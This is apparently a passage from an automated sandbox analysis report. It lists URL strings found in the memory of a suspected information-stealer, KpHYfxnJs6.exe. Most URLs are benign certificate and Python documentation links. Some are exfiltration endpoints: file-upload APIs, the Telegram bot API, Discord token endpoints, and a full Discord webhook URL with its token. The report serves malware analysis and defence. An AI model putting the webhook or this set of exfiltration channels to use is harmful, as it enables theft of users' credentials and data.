              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000046.00000002.2707327914.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000E.00000002.2538439375.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000E.00000002.2538439375.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2707327914.00000000046F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000E.00000002.2538439375.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2889989783.00000000078A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000046.00000002.2707327914.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: KpHYfxnJs6.exe, 00000004.00000003.2479999836.0000000007545000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479814100.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.0000000007531000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881124605.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617001102.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880323805.000000000752A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.000000000754D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: KpHYfxnJs6.exe, 00000004.00000003.2480053850.000000000750B000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479932107.0000000007506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
              Source: KpHYfxnJs6.exe, 00000004.00000003.2479999836.0000000007545000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479814100.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
              Source: KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: KpHYfxnJs6.exe, 00000004.00000003.2679930473.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000E.00000002.2538439375.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2707327914.00000000046F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
              Source: KpHYfxnJs6.exe, 00000004.00000002.2895190673.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: KpHYfxnJs6.exe, 00000004.00000003.2481397631.0000000007600000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2887221002.0000000007710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue42195.
              Source: KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: KpHYfxnJs6.exe, 00000004.00000002.2893281849.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2741428739.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743894441.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2683915266.0000000007B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894515812.0000000007E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1325289657537396889/J06FnIZUAv7ve4gZB3OnZqf37kI5zFxJAxHAJD7bveXtJPD
              Source: KpHYfxnJs6.exe, 00000004.00000003.2743545312.0000000007A22000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2893281849.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2891965646.0000000007A22000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2741428739.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743894441.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2683915266.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2683735538.0000000007A20000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2895190673.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2477289912.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2466905986.0000000004E66000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2475127207.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484207815.0000000004E0A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2476647140.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2474208164.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484268459.0000000004E67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484460219.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2466344184.0000000004E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: KpHYfxnJs6.exe, 00000004.00000002.2883936645.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: KpHYfxnJs6.exe, 00000004.00000002.2884950278.0000000006F80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: KpHYfxnJs6.exe, 00000004.00000002.2884950278.0000000006F80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: KpHYfxnJs6.exe, 00000004.00000002.2884004752.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: KpHYfxnJs6.exe, 00000004.00000002.2884950278.0000000006F80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: KpHYfxnJs6.exe, 00000004.00000002.2884950278.0000000006F80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
